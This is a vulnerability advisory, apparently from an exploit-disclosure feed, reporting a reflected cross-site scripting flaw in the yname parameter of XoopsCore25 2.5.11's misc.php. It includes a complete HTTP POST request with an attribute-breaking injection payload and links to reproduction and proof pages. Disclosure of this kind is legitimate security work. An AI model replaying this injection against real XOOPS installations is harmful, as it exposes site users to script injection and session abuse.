## Title: XoopsCore25-2.5.11-XSS-Reflected
## Author: nu11secur1ty
## Date: 02/12/2024
## Vendor: https://xoops.org/
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:
The value of the yname request parameter is copied into the value of
an HTML tag attribute which is encapsulated in single quotation marks.
The payload '>333< was submitted in the yname parameter. This input
was echoed unmodified in the application's response. The attacker can
trick the user to visit very dangerous and malicious URL in this
session
STATUS: HIGH Vulnerability
[+]Exploit execution:
```POST
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn
Origin: https://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 148
yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)
## Time spent:
01:17:00